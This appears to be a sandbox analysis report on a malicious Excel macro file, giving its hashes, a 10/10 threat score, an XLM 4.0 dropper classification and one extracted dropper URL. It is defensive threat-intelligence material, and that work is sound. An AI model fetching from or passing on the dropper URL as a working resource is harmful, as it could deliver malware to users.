Overview

overview

10

Static

static

8

343e8cd56f...e.xlsm

windows7-x64

10

343e8cd56f...e.xlsm

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

  • Size

    352KB

  • Sample

    230129-x3n1gaag36

  • MD5

    3aebf48834a573652d1b3f0351a6b15b

  • SHA1

    12cae410819cce11d119d5f19a51eee70e644d01

  • SHA256

    343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

  • SHA512

    0eb1a36c38b4f9b873901fb395fcd7438e06916393748f1023f563e22a67cee961e35a092f9ec5551b4cd136f5bf92a64efcadb757160a47bed027a2b81a63cb

  • SSDEEP

    6144:ATq1jURRRY1QzB8WTXgmKjNNt9MxBJd6E3MsUbsXmR6hSJi6qnS:ui1QzB8WTyjNpMesUbsXmR6hS06qnS

Score
10/10
macroxlm

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://powerdust.digital/g

Targets

    • Target

      343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

    • Size

      352KB

    • MD5

      3aebf48834a573652d1b3f0351a6b15b

    • SHA1

      12cae410819cce11d119d5f19a51eee70e644d01

    • SHA256

      343e8cd56fd9afa4dd1b2f7841a6c82c1e82f03d87fc4b234b96ae3de077456e

    • SHA512

      0eb1a36c38b4f9b873901fb395fcd7438e06916393748f1023f563e22a67cee961e35a092f9ec5551b4cd136f5bf92a64efcadb757160a47bed027a2b81a63cb

    • SSDEEP

      6144:ATq1jURRRY1QzB8WTXgmKjNNt9MxBJd6E3MsUbsXmR6hSJi6qnS:ui1QzB8WTyjNpMesUbsXmR6hS06qnS

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

        Discovery

        Execution

          Exfiltration

            Impact

              Initial Access

                Lateral Movement

                  Persistence

                    Privilege Escalation

                      Tasks